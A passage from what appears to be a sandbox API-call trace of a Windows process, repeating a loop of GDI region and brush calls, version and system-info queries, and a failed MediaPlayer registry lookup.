phkResult=0x181828*=0x0) returned 0x5 [0017.631] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8504027d [0017.631] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8f040713 [0017.631] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b65 [0017.631] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b66 [0017.631] CombineRgn (hrgnDst=0x1040b65, hrgnSrc1=0x8504027d, hrgnSrc2=0x8f040713, iMode=1) returned 1 [0017.631] CombineRgn (hrgnDst=0x1040b66, hrgnSrc1=0x8504027d, hrgnSrc2=0x8f040713, iMode=4) returned 2 [0017.631] CreateSolidBrush (color=0xff) returned 0x2100b64 [0017.631] CreateSolidBrush (color=0xff0000) returned 0x1100b67 [0017.631] DeleteObject (ho=0x1100b67) returned 1 [0017.631] DeleteObject (ho=0x8f040713) returned 1 [0017.631] DeleteObject (ho=0x8504027d) returned 1 [0017.631] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.632] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.632] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.632] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.632] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.632] BeginPath (hdc=0x0) returned 0 [0017.632] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.632] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.632] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.632] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.632] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.632] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.632] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.632] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.632] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x90040713 [0017.632] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8604027d [0017.632] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b68 [0017.632] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b69 [0017.632] CombineRgn (hrgnDst=0x1040b68, hrgnSrc1=0x90040713, hrgnSrc2=0x8604027d, iMode=1) returned 1 [0017.632] CombineRgn (hrgnDst=0x1040b69, hrgnSrc1=0x90040713, hrgnSrc2=0x8604027d, iMode=4) returned 2 [0017.632] CreateSolidBrush (color=0xff) returned 0x2100b67 [0017.632] CreateSolidBrush (color=0xff0000) returned 0x1100b6a [0017.632] DeleteObject (ho=0x1100b6a) returned 1 [0017.632] DeleteObject (ho=0x8604027d) returned 1 [0017.632] DeleteObject (ho=0x90040713) returned 1 [0017.632] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.632] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.632] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.632] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.632] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.632] BeginPath (hdc=0x0) returned 0 [0017.633] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.633] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.633] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.633] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.633] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.633] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.633] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.633] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.633] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8704027d [0017.633] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x91040713 [0017.633] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b6b [0017.633] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b6c [0017.633] CombineRgn (hrgnDst=0x1040b6b, hrgnSrc1=0x8704027d, hrgnSrc2=0x91040713, iMode=1) returned 1 [0017.633] CombineRgn (hrgnDst=0x1040b6c, hrgnSrc1=0x8704027d, hrgnSrc2=0x91040713, iMode=4) returned 2 [0017.633] CreateSolidBrush (color=0xff) returned 0x2100b6a [0017.633] CreateSolidBrush (color=0xff0000) returned 0x1100b6d [0017.633] DeleteObject (ho=0x1100b6d) returned 1 [0017.633] DeleteObject (ho=0x91040713) returned 1 [0017.633] DeleteObject (ho=0x8704027d) returned 1 [0017.633] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.633] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.633] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.633] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.633] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.633] BeginPath (hdc=0x0) returned 0 [0017.633] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.633] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.633] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.633] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.633] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.633] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.634] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.634] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.634] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x92040713 [0017.634] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8804027d [0017.634] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b6e [0017.634] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b6f [0017.634] CombineRgn (hrgnDst=0x1040b6e, hrgnSrc1=0x92040713, hrgnSrc2=0x8804027d, iMode=1) returned 1 [0017.634] CombineRgn (hrgnDst=0x1040b6f, hrgnSrc1=0x92040713, hrgnSrc2=0x8804027d, iMode=4) returned 2 [0017.634] CreateSolidBrush (color=0xff) returned 0x2100b6d [0017.634] CreateSolidBrush (color=0xff0000) returned 0x1100b70 [0017.634] DeleteObject (ho=0x1100b70) returned 1 [0017.634] DeleteObject (ho=0x8804027d) returned 1 [0017.634] DeleteObject (ho=0x92040713) returned 1 [0017.634] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.634] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.634] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.634] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.634] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.634] BeginPath (hdc=0x0) returned 0 [0017.634] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.634] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.634] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.634] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.634] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.634] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.634] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.634] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.635] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8904027d [0017.635] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x93040713 [0017.635] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b71 [0017.635] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b72 [0017.635] CombineRgn (hrgnDst=0x1040b71, hrgnSrc1=0x8904027d, hrgnSrc2=0x93040713, iMode=1) returned 1 [0017.635] CombineRgn (hrgnDst=0x1040b72, hrgnSrc1=0x8904027d, hrgnSrc2=0x93040713, iMode=4) returned 2 [0017.635] CreateSolidBrush (color=0xff) returned 0x2100b70 [0017.635] CreateSolidBrush (color=0xff0000) returned 0x1100b73 [0017.635] DeleteObject (ho=0x1100b73) returned 1 [0017.635] DeleteObject (ho=0x93040713) returned 1 [0017.635] DeleteObject (ho=0x8904027d) returned 1 [0017.635] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.635] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.635] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.635] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.635] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.635] BeginPath (hdc=0x0) returned 0 [0017.635] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.635] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.635] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.635] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.635] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.635] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.635] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.635] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.635] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x94040713 [0017.635] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8a04027d [0017.635] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b74 [0017.635] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b75 [0017.635] CombineRgn (hrgnDst=0x1040b74, hrgnSrc1=0x94040713, hrgnSrc2=0x8a04027d, iMode=1) returned 1 [0017.636] CombineRgn (hrgnDst=0x1040b75, hrgnSrc1=0x94040713, hrgnSrc2=0x8a04027d, iMode=4) returned 2 [0017.636] CreateSolidBrush (color=0xff) returned 0x2100b73 [0017.636] CreateSolidBrush (color=0xff0000) returned 0x1100b76 [0017.636] DeleteObject (ho=0x1100b76) returned 1 [0017.636] DeleteObject (ho=0x8a04027d) returned 1 [0017.636] DeleteObject (ho=0x94040713) returned 1 [0017.636] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.636] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.636] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.636] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.636] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.636] BeginPath (hdc=0x0) returned 0 [0017.636] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.636] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.636] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.636] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.636] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.636] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.636] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.636] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.636] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8b04027d [0017.636] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x95040713 [0017.636] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b77 [0017.636] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b78 [0017.636] CombineRgn (hrgnDst=0x1040b77, hrgnSrc1=0x8b04027d, hrgnSrc2=0x95040713, iMode=1) returned 1 [0017.636] CombineRgn (hrgnDst=0x1040b78, hrgnSrc1=0x8b04027d, hrgnSrc2=0x95040713, iMode=4) returned 2 [0017.636] CreateSolidBrush (color=0xff) returned 0x2100b76 [0017.636] CreateSolidBrush (color=0xff0000) returned 0x1100b79 [0017.636] DeleteObject (ho=0x1100b79) returned 1 [0017.636] DeleteObject (ho=0x95040713) returned 1 [0017.636] DeleteObject (ho=0x8b04027d) returned 1 [0017.636] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.636] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.637] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.637] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.637] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.637] BeginPath (hdc=0x0) returned 0 [0017.637] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.637] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.637] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.637] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.637] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.637] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.637] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.637] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.637] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x96040713 [0017.637] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8c04027d [0017.637] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b7a [0017.637] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b7b [0017.637] CombineRgn (hrgnDst=0x1040b7a, hrgnSrc1=0x96040713, hrgnSrc2=0x8c04027d, iMode=1) returned 1 [0017.637] CombineRgn (hrgnDst=0x1040b7b, hrgnSrc1=0x96040713, hrgnSrc2=0x8c04027d, iMode=4) returned 2 [0017.637] CreateSolidBrush (color=0xff) returned 0x2100b79 [0017.637] CreateSolidBrush (color=0xff0000) returned 0x1100b7c [0017.637] DeleteObject (ho=0x1100b7c) returned 1 [0017.637] DeleteObject (ho=0x8c04027d) returned 1 [0017.637] DeleteObject (ho=0x96040713) returned 1 [0017.637] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.637] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.637] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.637] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.637] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.637] BeginPath (hdc=0x0) returned 0 [0017.638] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.638] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.638] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.638] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.638] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.638] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x8d04027d [0017.638] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x97040713 [0017.638] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b7d [0017.638] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b7e [0017.638] CombineRgn (hrgnDst=0x1040b7d, hrgnSrc1=0x8d04027d, hrgnSrc2=0x97040713, iMode=1) returned 1 [0017.638] CombineRgn (hrgnDst=0x1040b7e, hrgnSrc1=0x8d04027d, hrgnSrc2=0x97040713, iMode=4) returned 2 [0017.638] CreateSolidBrush (color=0xff) returned 0x2100b7c [0017.638] CreateSolidBrush (color=0xff0000) returned 0x1100b7f [0017.638] DeleteObject (ho=0x1100b7f) returned 1 [0017.638] DeleteObject (ho=0x97040713) returned 1 [0017.638] DeleteObject (ho=0x8d04027d) returned 1 [0017.638] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.638] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.638] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.638] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.638] BeginPath (hdc=0x0) returned 0 [0017.638] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.638] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.638] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.638] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.638] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.639] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.639] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.639] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x98040713 [0017.639] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x8e04027d [0017.639] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b80 [0017.639] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b81 [0017.639] CombineRgn (hrgnDst=0x1040b80, hrgnSrc1=0x98040713, hrgnSrc2=0x8e04027d, iMode=1) returned 1 [0017.639] CombineRgn (hrgnDst=0x1040b81, hrgnSrc1=0x98040713, hrgnSrc2=0x8e04027d, iMode=4) returned 2 [0017.639] CreateSolidBrush (color=0xff) returned 0x2100b7f [0017.639] CreateSolidBrush (color=0xff0000) returned 0x1100b82 [0017.639] DeleteObject (ho=0x1100b82) returned 1 [0017.639] DeleteObject (ho=0x8e04027d) returned 1 [0017.639] DeleteObject (ho=0x98040713) returned 1 [0017.639] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: 